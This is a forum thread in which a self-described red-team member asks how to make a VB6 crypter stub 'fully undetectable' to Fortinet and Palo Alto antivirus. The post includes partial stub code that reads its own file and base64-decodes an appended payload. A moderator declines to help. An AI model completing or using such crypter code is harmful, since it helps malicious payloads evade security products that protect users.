Results 1 to 4 of 4

Thread: Pentesting - Crypter

  1. #1

    Thread Starter
    New Member
    Join Date
    Sep 2022
    Posts
    3

    Question Pentesting - Crypter

    Good fellow community members , I have been seeing some incredible topics on this forum,
    and I got curious because in my company we are starting the topic of av evasion.

    So I got to it and installed vb6 (I am not a programmer, I understand the code only).
    I was looking for the best algorithm to encrypt the stub to be able to create a fud, for Fortinet, palo alto, etc.

    I just joined the red team but as you understand I am embarrassed to go asking for help with something that to my understanding is not so complicated,
    I appreciate any response greetings! I leave the code, the stub!

    Code:
    Sub main()
        Dim sMe() As String 'Array que contiene el Stub y el archivo cifrado
        Dim sDelimitador As String 'Igual que en el builder
        Dim b64 As New clsBase64 'Instancia de la clase clsBase64
        Dim sDescifrado As String 'Archivo descifrado
        Dim sBinario() As Byte 'Array de bytes que tendrá el archivo descifrado
        
        sDelimitador = "[Blau]Delimitador[Blau]" 'IMPORTANTE: mismo delimitador que en el builder
        sMe = SplitMyself(sDelimitador)
        
        '[Array] sMe
        'sMe(0) = Stub
        'sMe(1) = Archivo cifrado
        
        sDescifrado = b64.Decode(sMe(1)) 'Guardamos el archivo descifrado en la variable 'sDescifrado'
        sBinario = StrConv(sDescifrado, vbFromUnicode) 'Convertimos el archivo descifrado a una array de bytes
        
        
    End Sub
    
    Public Function GetCurrentPath() 'Función para obtener la ruta del archivo
        GetCurrentPath = App.path & "\" & App.EXEName & ".exe"
    End Function
    
    Public Function ReadMyself() 'Función para leerse a sí mismo
        Dim ret As String
        Open GetCurrentPath For Binary As #1
            ret = Space(LOF(1))
            Get #1, , ret
        Close #1
        ReadMyself = ret
    End Function
    
    Public Function SplitMyself(sDelimitador As String) 'Función para dividir el stub del archivo cifrado gracias al delimitador
        SplitMyself = Split(ReadMyself, sDelimitador)
    End Function

  2. #2

    Thread Starter
    New Member
    Join Date
    Sep 2022
    Posts
    3

    Re: Pentesting - Crypter

    I have seen things like CryptoSys API, is it ok?

  3. #3

    Thread Starter
    New Member
    Join Date
    Sep 2022
    Posts
    3

    Re: Pentesting - Crypter

    Bump it.

  4. #4
    Super Moderator FunkyDexter's Avatar
    Join Date
    Apr 2005
    Location
    An obscure body in the SK system. The inhabitants call it Earth
    Posts
    7,900

    Re: Pentesting - Crypter

    By AV Evasion, I assume you mean Anti Virus Evasion. If so you simply shouldn't be doing it and you're unlikely to get any help here.

    Instead you should be writing your software conforming to normal Operating System Best Practice such that it doesn't appear to be a virus. If you absolutely have to break best practice in some way then you should be contacting the major Anti Virus software providers to get your software white listed and/or informing your customers that your software is likely to be detected as a virus.

    If I've misunderstood and AV Evasion has some other meaning then I think you're going to have to be clearer about what you're asking.
    The best argument against democracy is a five minute conversation with the average voter - Winston Churchill

    Hadoop actually sounds more like the way they greet each other in Yorkshire - Inferrd

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  



Click Here to Expand Forum to Full Width